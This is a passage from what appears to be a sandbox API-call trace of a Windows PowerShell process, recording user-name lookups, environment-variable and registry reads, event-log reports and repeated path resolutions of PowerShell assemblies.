	[0606.425] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b9843e0, nSize=0xcd5c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd5c8) returned 0x1
	[0606.425] CoTaskMemFree (pv=0x1b9843e0) 
	[0606.425] CoTaskMemAlloc (cb=0x204) returned 0x2f3620
	[0606.425] GetUserNameW (in: lpBuffer=0x2f3620, pcbBuffer=0xcd608 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd608) returned 1
	[0606.426] CoTaskMemFree (pv=0x2f3620) 
	[0606.426] ReportEventW (hEventLog=0x1ba50008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x361d8b0*="Variable", lpRawData=0x361d640) returned 1
	[0606.428] CoTaskMemAlloc (cb=0x104) returned 0x2913d0
	[0606.428] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2913d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0606.428] CoTaskMemFree (pv=0x2913d0) 
	[0606.431] CoTaskMemAlloc (cb=0x104) returned 0x2913d0
	[0606.431] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2913d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0606.431] CoTaskMemFree (pv=0x2913d0) 
	[0606.434] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xcce70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0606.434] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xccdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0606.434] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xccdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0606.434] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xccdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0607.430] CoTaskMemAlloc (cb=0x804) returned 0x1b9843e0
	[0607.430] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b9843e0, nSize=0xcd5c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd5c8) returned 0x1
	[0607.431] CoTaskMemFree (pv=0x1b9843e0) 
	[0607.431] CoTaskMemAlloc (cb=0x204) returned 0x2f3620
	[0607.431] GetUserNameW (in: lpBuffer=0x2f3620, pcbBuffer=0xcd608 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd608) returned 1
	[0607.432] CoTaskMemFree (pv=0x2f3620) 
	[0607.432] ReportEventW (hEventLog=0x1ba50008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3631708*="Certificate", lpRawData=0x3631498) returned 1
	[0607.551] CoTaskMemAlloc (cb=0x104) returned 0x2913d0
	[0607.551] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2913d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0607.551] CoTaskMemFree (pv=0x2913d0) 
	[0607.555] GetLogicalDrives () returned 0x4
	[0607.555] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xcd250, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0607.555] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0607.556] CoTaskMemAlloc (cb=0x20e) returned 0x32d1e0
	[0607.556] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x32d1e0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0607.556] CoTaskMemFree (pv=0x32d1e0) 
	[0607.558] CoTaskMemAlloc (cb=0x104) returned 0x2913d0
	[0607.558] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2913d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0607.558] CoTaskMemFree (pv=0x2913d0) 
	[0607.558] CoTaskMemAlloc (cb=0x104) returned 0x2913d0
	[0607.558] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2913d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0607.558] CoTaskMemFree (pv=0x2913d0) 
	[0607.574] CoTaskMemAlloc (cb=0x104) returned 0x2913d0
	[0607.574] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2913d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0607.574] CoTaskMemFree (pv=0x2913d0) 
	[0607.576] CoTaskMemAlloc (cb=0x104) returned 0x2913d0
	[0607.576] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2913d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0607.576] CoTaskMemFree (pv=0x2913d0) 
	[0607.576] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xccfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0607.576] SetErrorMode (uMode=0x1) returned 0x1
	[0607.576] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xcd210 | out: lpFileInformation=0xcd210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0607.577] SetErrorMode (uMode=0x1) returned 0x1
	[0607.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xccfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0607.577] SetErrorMode (uMode=0x1) returned 0x1
	[0607.577] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xcd210 | out: lpFileInformation=0xcd210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0607.577] SetErrorMode (uMode=0x1) returned 0x1
	[0607.577] CoTaskMemAlloc (cb=0x104) returned 0x2913d0
	[0607.577] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2913d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0607.577] CoTaskMemFree (pv=0x2913d0) 
	[0607.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xcd150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0607.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xcd270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0607.585] SetErrorMode (uMode=0x1) returned 0x1
	[0607.585] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xcd4d0 | out: lpFileInformation=0xcd4d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0607.585] SetErrorMode (uMode=0x1) returned 0x1
	[0608.421] CoTaskMemAlloc (cb=0x804) returned 0x1b9843e0
	[0608.421] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b9843e0, nSize=0xcd838 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd838) returned 0x1
	[0608.421] CoTaskMemFree (pv=0x1b9843e0) 
	[0608.421] CoTaskMemAlloc (cb=0x204) returned 0x2f3620
	[0608.421] GetUserNameW (in: lpBuffer=0x2f3620, pcbBuffer=0xcd878 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd878) returned 1
	[0608.422] CoTaskMemFree (pv=0x2f3620) 
	[0608.422] ReportEventW (hEventLog=0x1ba50008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x366a3f0*="Available", lpRawData=0x366a180) returned 1
	[0609.683] CoTaskMemAlloc (cb=0x104) returned 0x2913d0
	[0609.683] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2913d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0609.683] CoTaskMemFree (pv=0x2913d0) 
	[0609.683] CoTaskMemAlloc (cb=0x104) returned 0x2913d0
	[0609.684] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2913d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0609.684] CoTaskMemFree (pv=0x2913d0) 
	[0609.686] CoTaskMemAlloc (cb=0x104) returned 0x2913d0
	[0609.686] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x2913d0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0609.686] CoTaskMemFree (pv=0x2913d0) 
	[0609.686] CoTaskMemAlloc (cb=0x104) returned 0x2913d0
	[0609.687] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x2913d0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0609.687] CoTaskMemFree (pv=0x2913d0) 
	[0609.689] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd858 | out: phkResult=0xcd858*=0x390) returned 0x0
	[0609.689] RegQueryValueExW (in: hKey=0x390, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd7dc, lpData=0x0, lpcbData=0xcd7d8*=0x0 | out: lpType=0xcd7dc*=0x1, lpData=0x0, lpcbData=0xcd7d8*=0x56) returned 0x0
	[0609.689] CoTaskMemAlloc (cb=0x5a) returned 0x1b963920
	[0609.689] RegQueryValueExW (in: hKey=0x390, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd7ac, lpData=0x1b963920, lpcbData=0xcd7a8*=0x56 | out: lpType=0xcd7ac*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd7a8*=0x56) returned 0x0
	[0609.689] CoTaskMemFree (pv=0x1b963920) 
	[0609.689] RegCloseKey (hKey=0x390) returned 0x0
	[0609.690] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0609.690] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0609.690] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0609.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0609.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0609.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0609.692] CoTaskMemAlloc (cb=0x104) returned 0x2913d0
	[0609.693] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2913d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0609.693] CoTaskMemFree (pv=0x2913d0) 
	[0609.693] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0609.693] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0609.693] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0609.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0609.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0609.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0609.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0609.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0609.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0609.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0609.696] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0609.696] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0609.696] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0609.696] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0609.696] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0609.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0609.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0609.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0609.699] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0609.699] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0609.700] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0609.700] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0609.700] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0609.700] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0609.701] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0609.701] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0609.701] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0609.701] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0609.702] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0609.702] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0609.702] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
